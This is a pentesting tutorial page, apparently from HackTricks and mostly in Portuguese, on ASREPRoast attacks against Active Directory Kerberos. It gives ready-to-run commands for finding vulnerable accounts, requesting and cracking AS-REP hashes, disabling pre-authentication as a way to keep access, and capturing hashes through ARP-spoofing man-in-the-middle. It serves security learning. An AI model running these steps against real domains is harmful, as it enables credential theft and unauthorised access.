ASREPRoast

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

ASREPRoast

ASREPRoast é um ataque de segurança que explora usuários que não possuem o Kerberos pre-authentication required attribute. Essencialmente, essa vulnerabilidade permite que atacantes solicitem autenticação para um usuário ao Domain Controller (DC) sem precisar da senha do usuário. O DC então responde com uma mensagem criptografada com a chave derivada da senha do usuário, que os atacantes podem tentar quebrar offline para descobrir a senha do usuário.

The main requirements for this attack are:

  • Lack of Kerberos pre-authentication: Os usuários alvo não devem ter esse recurso de segurança habilitado.
  • Connection to the Domain Controller (DC): Os atacantes precisam de acesso ao DC para enviar requisições e receber mensagens criptografadas.
  • Optional domain account: Possuir uma domain account permite que atacantes identifiquem usuários vulneráveis de forma mais eficiente por meio de consultas LDAP. Sem tal conta, os atacantes precisarão adivinhar nomes de usuário.

Enumerating vulnerable users (need domain credentials)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName

Solicitar mensagem AS_REP

#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

Warning

AS-REP Roasting com Rubeus gerará um 4768 com um tipo de criptografia 0x17 e tipo de preauth 0.

Comandos rápidos (Linux)

  • Enumere potenciais alvos primeiro (por exemplo, a partir de caminhos de build vazados) com Kerberos userenum: kerbrute userenum users.txt -d domain --dc dc.domain
  • Obtenha o AS-REP de um único usuário mesmo com uma senha em branco usando netexec ldap <dc> -u svc_scan -p '' --asreproast out.asreproast (o netexec também imprime LDAP signing/channel binding posture).
  • Quebre com hashcat out.asreproast /path/rockyou.txt – ele detecta automaticamente -m 18200 (etype 23) para hashes AS-REP roast.

Cracking

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Persistência

Forçar preauth não requerido para um usuário onde você tem permissões GenericAll (ou permissões para escrever propriedades):

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user'

ASREProast sem credenciais

Um atacante pode usar uma posição de man-in-the-middle para capturar AS-REP packets enquanto atravessam a rede sem depender de Kerberos pre-authentication estar desativado. Portanto, funciona para todos os usuários na VLAN.
ASRepCatcher permite que façamos isso. Além disso, a ferramenta força as estações de trabalho clientes a usarem RC4 ao alterar Kerberos negotiation.

# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen

Referências


Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks